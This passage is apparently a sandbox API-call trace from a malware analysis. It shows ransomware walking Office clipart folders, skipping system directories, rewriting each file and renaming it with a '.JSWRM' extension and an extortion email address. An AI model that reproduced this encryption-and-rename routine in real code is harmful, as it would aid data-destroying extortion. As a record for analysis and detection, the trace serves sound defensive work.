hHeap=0x1e0000) returned 1 [0077.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0077.659] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247c78 [0077.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0077.659] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.659] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00779_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00779_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247c78 | out: hHeap=0x1e0000) returned 1 [0077.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0077.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2106b0 | out: hHeap=0x1e0000) returned 1 [0077.660] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeddf37, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeddf37, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3690, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00799_.WMF", cAlternateFileName="")) returned 1 [0077.660] lstrcmpiW (lpString1="FD00799_.WMF", lpString2=".") returned 1 [0077.660] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="..") returned 1 [0077.660] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="...") returned 1 [0077.660] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="windows") returned -1 [0077.660] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="recovery") returned -1 [0077.660] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="perflogs") returned -1 [0077.660] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="documents and settings") returned 1 [0077.660] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.660] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="system volume information") returned -1 [0077.660] lstrcmpiW (lpString1="FD00799_.WMF", lpString2="msocache") returned -1 [0077.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0077.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00799_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00799_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00799_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0077.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0077.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00799_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00799_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00799_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0077.660] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0077.660] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0077.660] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.661] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0077.661] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.661] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=13968) returned 1 [0077.661] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.661] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3690) returned 0x24d210 [0077.661] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3690, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3690, lpOverlapped=0x0) returned 1 [0077.664] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.664] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3690, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3690, lpOverlapped=0x0) returned 1 [0077.664] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.664] CloseHandle (hObject=0x314) returned 1 [0077.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0077.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0077.664] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.664] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0077.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0077.665] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0077.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cff0 [0077.665] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0077.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cff0 | out: hHeap=0x1e0000) returned 1 [0077.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.665] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00799_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00799_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0077.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0077.665] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0077.665] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0xa6d0, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00814_.WMF", cAlternateFileName="")) returned 1 [0077.665] lstrcmpiW (lpString1="FD00814_.WMF", lpString2=".") returned 1 [0077.665] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="..") returned 1 [0077.665] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="...") returned 1 [0077.665] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="windows") returned -1 [0077.666] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="recovery") returned -1 [0077.666] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="perflogs") returned -1 [0077.666] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="documents and settings") returned 1 [0077.666] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.666] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="system volume information") returned -1 [0077.666] lstrcmpiW (lpString1="FD00814_.WMF", lpString2="msocache") returned -1 [0077.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241010 [0077.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00814_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00814_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00814_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241010 | out: hHeap=0x1e0000) returned 1 [0077.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0077.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00814_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00814_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00814_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0077.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2100c0 [0077.666] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0077.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.666] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.666] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0077.666] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.667] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=42704) returned 1 [0077.667] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.667] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa6d0) returned 0x24d210 [0077.667] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0xa6d0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0xa6d0, lpOverlapped=0x0) returned 1 [0077.671] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.671] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0xa6d0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0xa6d0, lpOverlapped=0x0) returned 1 [0077.671] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.675] CloseHandle (hObject=0x314) returned 1 [0077.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2103b8 [0077.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0077.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a468 [0077.675] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a468, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a468 | out: hHeap=0x1e0000) returned 1 [0077.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d878 [0077.675] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0077.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d878 | out: hHeap=0x1e0000) returned 1 [0077.675] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0077.675] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00814_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00814_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0077.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2103b8 | out: hHeap=0x1e0000) returned 1 [0077.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0077.676] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x3b3c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD00965_.WMF", cAlternateFileName="")) returned 1 [0077.676] lstrcmpiW (lpString1="FD00965_.WMF", lpString2=".") returned 1 [0077.676] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="..") returned 1 [0077.676] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="...") returned 1 [0077.676] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="windows") returned -1 [0077.676] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="recovery") returned -1 [0077.676] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="perflogs") returned -1 [0077.676] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="documents and settings") returned 1 [0077.676] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="$RECYCLE.BIN") returned 1 [0077.676] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="system volume information") returned -1 [0077.676] lstrcmpiW (lpString1="FD00965_.WMF", lpString2="msocache") returned -1 [0077.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0077.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00965_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00965_.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00965_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.676] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0077.676] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0077.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00965_.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0077.676] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="FD00965_.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="FD00965_.WMF", lpUsedDefaultChar=0x0) returned 12 [0077.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0077.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210320 [0077.677] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2100c0 | out: hHeap=0x1e0000) returned 1 [0077.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0077.677] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0077.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0077.677] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00965_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0077.677] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=15164) returned 1 [0077.677] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.677] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x3b30) returned 0x24d210 [0077.678] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x3b30, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x3b30, lpOverlapped=0x0) returned 1 [0077.680] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0077.680] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x3b30, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x3b30, lpOverlapped=0x0) returned 1 [0077.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0077.680] CloseHandle (hObject=0x314) returned 1 [0077.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0077.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0077.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0077.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22ce70, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0077.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0077.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0077.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0077.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a4b0 [0077.680] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a4b0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0077.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a4b0 | out: hHeap=0x1e0000) returned 1 [0077.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0077.680] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2473c0 [0077.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0077.680] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0077.681] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00965_.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\FD00965_.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\fd00965_.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0077.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2473c0 | out: hHeap=0x1e0000) returned 1 [0077.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0077.681] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0077.681] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xdeb7dac, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xdeb7dac, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xdeddf37, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x121a, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="FD01074_.WMF", cAlternateFileName="")) returned 1 [0077.681] lstrcmpiW (lpString1="FD01074_.WMF", lpString2=".") returned 1 [0077.681] lstrcmpiW (lpString1="FD01074_.WMF", lpString2="..") returned 1 [0077.681] lstrcmpiW (lpString1="FD01074_.WMF", lpString2="...") returned 1 [0077.681] 